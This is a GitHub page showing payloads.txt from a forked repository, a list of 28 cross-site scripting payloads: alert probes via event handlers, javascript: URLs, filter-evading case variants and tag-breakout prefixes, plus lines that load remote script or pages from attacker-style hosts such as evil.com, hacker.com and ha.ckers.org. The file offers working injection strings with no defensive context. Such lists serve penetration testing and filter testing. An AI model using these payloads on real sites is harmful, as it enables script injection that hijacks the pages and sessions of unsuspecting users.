forked from filipherle/SQL-XSS
-
Notifications
You must be signed in to change notification settings - Fork 0
/
payloads.txt
28 lines (28 loc) · 1.23 KB
/
payloads.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<body onload=alert("XSS")>
<img src="javascript:alert("XSS");">
<iframe src="http://evil.com/xss.html">
<input type="image" src="javascript:alert('XSS');">
<link rel="stylesheet" href="javascript:alert('XSS');">
<table background="javascript:alert('XSS')">
<div style="background-image: url(javascript:alert('XSS'))">
<object type="text/x-scriptlet" data="http://hacker.com/xss.html">
>'>"><img src=x onerror=alert(0)>
<svg/onload=alert(/RUTHLESS/)>
<img src='aaa'onerror=alert(/@_t0x1c/)>
<!'/*!'/*!//'/*//'/*--!><Input/Autofocus/%0D*/Onfocus=confirm'1'//><Svg>
</style></scRipt><scRipt>alert('OPENBUGBOUNTY')</scRipt>
<sCriPt>alert(1);</sCriPt>
<script>alert(1)</script>
<script src=http://ha.ckers.org/xss.js></script>
'><script>alert(1)</script>
\"><img src=\"blah.jpg\" onerror=\"alert('XSS')\"/>
\"><script>alert(1)</script>
\"\/><img src=\"blahjpg\" onerror=\"alert('XSS')\"/>
\"\/><img src=\"blah.jpg\" onerror=\"alert('XSS')\"/>
\"/><script>alert(1)</script>
<IMG \"\"\"><script>alert(\"XSS\")</script>\">
<script>alert(String.fromCharCode(88,83,83));</script>
"onmouseover=prompt(/XSSPOSED/)
</title><body onload=alert("XSS")>
</title><script>alert(1)</script>
"></title></style></scRipt><scRipt>alert('OPENBUGBOUNTY')</scRipt>